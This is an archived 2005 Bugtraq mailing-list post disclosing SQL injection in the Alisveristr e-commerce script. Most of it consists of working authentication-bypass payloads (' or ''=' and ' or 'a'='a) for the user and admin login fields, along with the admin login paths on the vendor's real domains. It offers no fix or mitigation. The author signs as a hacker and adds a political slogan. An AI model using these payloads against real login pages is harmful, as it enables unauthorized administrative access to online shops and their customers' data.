[41487] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Alisveristr E-Commerce Admin Login SQL İnjection

daemon@ATHENA.MIT.EDU (B3g0k@hackermail.com)
Sat Dec 3 14:40:08 2005

Date: 3 Dec 2005 00:53:31 -0000
Message-ID: <20051203005331.5115.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: B3g0k@hackermail.com
To: bugtraq@securityfocus.com

###Hi all
###B3g0k[at]hackermail.com
###Kurdish Hacker
###Special Thanx All Kurdish Hackers
###Freedom For Ocalan!!!
###-----------------------------------
###Alisveristr E-commerce User Login Sql &#304;njection
###Alisveristr E-commerce Admin Login Sql ###&#304;njection
###-----------------------------------
###Site: http://www.alisveristr.com or ###http://www.alisveris-tr.com
###
###Description: A E-Commerce scirpt it is too ###cool... :)
User login Sql &#304;njection:

Code 1 For User Login :

Username : ' or ''='              
Password: ' or ''='

Another User Login Sql &#304;njecition

Username : ' or 'a'='a
Password : ' or 'a'='a

----------------------------------

Now Admin login Sql injectoin
ex: http://site.com/yonetim/default.asp
http://www.alisveristr.com/yonetim
http://www.alisveris-tr.com/yonetim

Code 1 For Admin Login 
Username : ' or ''='
Password : ' or ''='

Code 2 For Admin Login :
Username : ' or 'a'='a
Password : ' or 'a'='a

Thats it.
Contact : B3g0k@hackermail.com
Kurdish Hacker


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[41487] in bugtraq

Alisveristr E-Commerce Admin Login SQL İnjection

daemon@ATHENA.MIT.EDU (B3g0k@hackermail.com)Sat Dec 3 14:40:08 2005

daemon@ATHENA.MIT.EDU (B3g0k@hackermail.com)
Sat Dec 3 14:40:08 2005